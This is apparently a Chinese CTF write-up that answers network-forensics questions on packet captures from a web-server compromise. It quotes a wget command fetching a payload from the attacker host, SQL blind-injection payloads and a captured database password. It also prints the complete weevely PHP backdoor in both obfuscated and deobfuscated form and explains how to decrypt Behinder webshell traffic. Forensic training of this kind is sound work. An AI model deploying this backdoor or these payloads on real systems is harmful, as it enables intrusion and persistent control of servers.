前言

记录DIDCTF中的2024数证杯初赛的流量分析题和2024数证杯决赛个人赛的流量分析题目。

一、初赛-网络流量分析

1、网络流量分析-1

分析网络流量包检材，写出抓取该流量包时所花费的秒数？（填写数字，答案格式：10）

秒数：3504

2、网络流量分析-2

分析网络流量包检材，抓取该流量包时使用计算机操作系统的build版本是多少？（答案格式：10D32）

版本：23F79

3、网络流量分析-3

分析网络流量包检材，受害者的IP地址是？（答案格式：192.168.1.1）

统计IPV4：

这两个应该一个是客户端，一个是服务端。

随便找个HTTP请求：

Host是192.168.75.131，肯定就是受害者了。

4、网络流量分析-4

分析网络流量包检材，受害者所使用的操作系统是？（小写字母，答案格式：biwu）

随便找个TCP流，我找的是1014：

页面的错误信息泄露了操作系统：ubuntu

5、网络流量分析-5

分析网络流量包检材，攻击者使用的端口扫描工具是？（小写字母，答案格式：abc）

过滤tcp流，看到大量的端口扫描的流量：

前边的都是空的，往后边找，找到tcp流的1019：

清楚看到User-Agent里：nmap

6、网络流量分析-6

分析网络流量包检材，攻击者使用的漏洞检测工具的版本号是？（答案格式：1.1.1）

过滤HTTP的请求后发现有大量的目录扫描：

随便找一个追踪tcp流，我这里找的是1082：

User-Agent：Wfuzz/3.1.0

答案是：3.1.0

7、网络流量分析-7

分析网络流量包检材，攻击者通过目录扫描得到的phpliteadmin登录点是？（答案格式：/abc/abc.php）

直接过滤POST请求：http.request.method==POST：

看到有个请求是：/dbadmin/test_db.php，猜测是登录请求，进去看一下：

确实是登录请求，那么登录点：/dbadmin/test_db.php

8、网络流量分析-8

分析网络流量包检材，攻击者成功登录到 phpliteadmin 时使用的密码是？（答案格式：按实际值填写）

TCP流的3218：

9、网络流量分析-9

分析网络流量包检材，攻击者创建的 phpinfo 页面文件名是？（答案格式：abc.txt）

TCP流的3221，找到了phpinfo：

服务器返回的是HTML标签，不好分析，保存成HTML文件看：

看到文件名是：demo.php

10、网络流量分析-10

分析网络流量包检材，攻击者利用服务器漏洞从攻击机上下载的 payload 文件名是？（答案格式：abc.txt）

服务器从攻击机上下载：192.168.75.131->192.168.75.132，过滤语法：ip.src==192.168.75.131 and ip.dst==192.168.75.132 and http

然后翻到了服务端向客户端请求了rev.txt

11、网络流量分析-11

分析网络流量包检材，攻击者反弹shell的地址及端口是？（答案格式：192.168.1.1:1234）

追踪这个rev.txt的http流：tcp.stream eq 3267：

里面就是木马的代码，代码中看到地址及端口是：192.168.75.132:30127

12、网络流量分析-12

分析网络流量包检材，攻击者电脑所使用的Python版本号是？（答案格式：1.1.1）

TCP流的3269：

版本：3.11.8

13、网络流量分析-13

分析网络流量包检材，受害者服务器中网站所使用的框架结构是？（答案格式：thinkphp）

上面已经找到了tcp流的3267是上传木马，那么接下来就是执行木马了，直接追踪tcp流的3268：

在里面找到了攻击者执行ls，而服务端返回的内容中有wordpress

14、网络流量分析-14

分析网络流量包检材，攻击者获取到的数据库密码是？（答案格式：大小写按实际值填写）

还是tcp流的3268，继续往下翻：

攻击者执行了cat wp-config.php，然后看到了它的内容，里面有DB_PASSWORD

密码是：sWfCsfJSPV9H3AmQzw8

15、网络流量分析-15

分析网络流量包检材，攻击者上传了一个weevely木马进行权限维持，上传时所使用的端口号为？（答案格式：3306）

还是TCP流的3268，继续往下翻：

攻击者执行了：wget 192.168.75.132:2000/help.php

那么端口就是：2000

16、网络流量分析-16

分析网络流量包检材，攻击者上传了一个weevely木马进行权限维持，该木马第一次执行时获取到的缓冲区内容是？（答案格式：按实际值填写）

首先在TCP流的3269找到了木马文件：

<?php
$q='uv1o2g6mkn7y";fv1unctiv1ov1n x(v1$t,$k){$c=v1strlen(v1$k)v1;v1$l=strlenv1($t);$o';
$k='tents(v1"php://iv1nput"),$v1mv1)==1) {@ov1b_start();v1@ev1val(@v1gzuncomv1press(@x(@';
$A='$k="c6v1ae1ev170";$khv1="cbbf9v1691e009";v1$v1kv1f="85a8v19e92c410";$p="dv1zINv1Rg';
$o='="v1";forv1($i=0;$v1iv1v1<$l;){fv1v1or($j=0;($j<$c&&$i<$lv1);$j++,$i++)v1{v1$o.=v1$t{$i}^';
$D=str_replace('cM','','cMcreacMte_cMfcMunccMcMtion');
$Q='$k{$j}v1v1;}}return v1$o;v1}if (@pregv1_v1match("/v1$kh(.+)v1v1$kf/",@v1fv1ile_get_cov1n';
$Z='leanv1();$r=@base6v14_ev1ncv1ode(v1@x(@gzcov1mpress($ov1),$v1kv1));printv1("$p$kh$r$kf");}';
$w='v1basev164_decodev1($mv1[v11]),$v1k)));$o=@ov1b_get_contev1nts(v1v1);@ob_env1d_c';
$S=str_replace('v1','',$A.$q.$o.$Q.$k.$w.$Z);
$C=$D('',$S);$C();
?>

应该是混淆了，根本分析不出来，把实际的木马整理出来：

<?php
$k="c6ae1e70";
$kh="cbbf9691e009";
$kf="85a89e92c410";
$p="dzINRguo2g6mkn7y";
functionx($t,$k){
$c=strlen($k);
$l=strlen($t);
$o="";
for($i=0;$i<$l;){
for($j=0;($j<$c&&$i<$l);$j++,$i++){
    $o.=$t{$i}^$k{$j};
    }
    }
return $o;
    }
if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {
    @ob_start();
    @eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
    $o=@ob_get_contents();
    @ob_end_clean();
    $r=@base64_encode(@x(@gzcompress($o),$k));
print("$p$kh$r$kf");
    }
?>

代码中kh和r应该就是执行的命令，我们找到第一次执行help.php的流量，解密一下：

tcp流的3274：

首先看请求体，kh是12位，r就是输出的字符的[29:-13]

那么请求体和响应体的$r就是：

G6oqKP+t4ABWAVLT4dExMHs6Ylw
G6pSUAZWgTBjNUtkPw==

解密后分别是：

echo(57638)
57638

二、决赛-个人赛-流量分析

1、流量分析-1

分析网络流量包，请问目录遍历攻击开始时间（北京时间）是什么时候？（答案格式：1990-01-01 01:01:01） (1.0分)

过滤HTTP请求，应该是从54号流量包开始的：

查看其时间：2024-10-24 17:26:12

2、流量分析-2

单选题 分析网络流量包，可以发现哪种攻击行为？ (1.0分)

A:网络钓鱼B:SQL注入C:拒绝服务攻击D:恶意软件传播E:中间人攻击

提交格式：flag{A}

往下一直翻，爆破目录结束后开始了SQL注入攻击：

flag{B}

3、流量分析-3

分析网络流量包，黑客获取到的数据库名称是？（答案格式：小写） (3.0分)

已经找到SQL注入的流量了，从387041号流量开始，攻击者执行的payload是：name=lucy' and substr(database(),1,1) ='a'-- ，明显是布尔盲注，那么判断这个语句是否正确就从返回的状态看，如果一个个查看返回语句比较复杂，而且很耗费时间，所以有个简单办法就是直接看返回包的长度，错误的情况下都是1229，然后翻到387851号流量包，返回的长度是1227，请求的语句是：name=lucy' and substr(database(),1,1) ='s'-- ，说明数据库名的第一位是s。

同样的方法找到第二位是e：

依此类推，得到数据库名：secret

4、流量分析-4

分析网络流量包，黑客通过时间盲注获取到的数据是什么？（答案格式：与实际大小写保持一致） (6.0分)

先随便找个时间盲注的语句：

然后写出过滤语法：http contains "login.php/?name=lucy'%20and%20if"

过滤出来后开始分析，首先看箭头1的位置，这时候已经开始判断第2位了，说明第1位已经判断结束，而箭头2的位置可以看到首先是判断>84，然后判断了>83，说明第一位的ascii码就是84……

也可以追踪流看看，大于83，页面返回空，说明触发了if条件吗，确定是84：

依此类推得到最终数据：

84 104 33 115 95 49 115 95 53 101 99 114 101 116 33
转成字符：
Th!s_1s_5ecret!

5、流量分析-5

分析网络流量包，黑客使用什么webshell管理工具控制服务器？（答案格式：请写中文名，无需填写版本号） (3.0分)

过滤HTTP请求后翻到最下面，发现在POST请求aes.php了：

猜测这个就是webshell文件，过滤出这个文件：http contains "aes.php"

然后只能凭经验了，tcp流的1645看到通过get请求了aes.php，并且传输了pass，然后返回了一串字符，这就是冰蝎的特征，这个阶段是冰蝎的密钥协商阶段：

6、流量分析-6

分析网络流量包，黑客通过后门执行的最后一条命令是什么？（答案格式：与实际大小写保持一致） (5.0分)

肯定是要解密冰蝎的流量了，但是流量里并没有给加密方式和初始向量，所以以为是ECB，但是并没有解出来，很苦恼……

查了writeup发现加密方式是CBC，而IV是0123456789abcdef……额，这是默认的？

密钥是有了，就是TCP流的1645的第二个密钥：72e03c7d2a44eadf

然后找到最后一个请求aes.php的流量，tcp流的1648：

然后进行解密：

看到执行的命令是：type login.php